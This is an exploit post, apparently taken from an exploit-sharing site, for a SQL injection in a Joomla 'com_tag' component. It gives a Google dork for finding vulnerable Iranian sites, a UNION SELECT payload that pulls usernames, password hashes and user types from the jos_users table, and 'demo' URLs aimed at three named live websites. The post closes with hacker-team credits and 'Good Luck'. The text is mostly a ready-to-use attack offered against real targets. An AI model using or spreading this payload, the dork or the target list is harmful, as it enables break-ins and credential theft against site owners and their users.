facebook facebook twitter rss

Joomla Iranians Site option tag - SQL Injection Vulnerability

Author: Rednofozi , Published: 15-10-2018
|--------------------------------------------------------------|
|[+] Exploit Title: Joomla Iranians Site option tag - SQL Injection Vulnerability
|[+] Exploit Author :Rednofozi
|[+] Tested on: : Windows 10 , parrot os
|[+] Vendor Homepage: dawat.ir
|[+] dork : inurl:option=com_tag +site:ir
|[+] MY page https://cxsecurity.com/author/Inj3ct0r
|[+] MY page http://www.exploit4arab.org/author/308/Rednofozi
|[+] MY site :anonysec.org
|[+] ME:Rednfozi@yahoo.com
|[+] ME:Rednofozi@hotmail.com
|[+] ME:inj3ct0r@tuta.io
|[+] fb.me :https://www.facebook.com/saeid.hat.3
|--------------------------------------------------------------|

|[+]|[+]

Exploit :info

Google Search inurl:option=com_tag +site:ir

Add this expedition later to the end

index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component

Then, the password of the admin and all the work for the site and tells you that you have to crack to get the original password


|--------------------------------------------------------------|
xamples
DEMO
http://dawat.ir/index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat(username,0x3a,password,0x3a,usertype)/**//*!from*//**/jos_users/**/&tmpl=component
http://mohrestan.ir/index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component
http://art2iran.com/index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component
183 results for hackeing


|--------------------------------------------------------------|

RHG Team hackers
|==================================================================
# {TNX For}
# >>> Thanks To: ReZa CLONER , Moeein Seven. Rednofozi
# >>> Discovered By :Rednofozi
|====================================================================================
The END ; Good Luck

Like us on Facebook :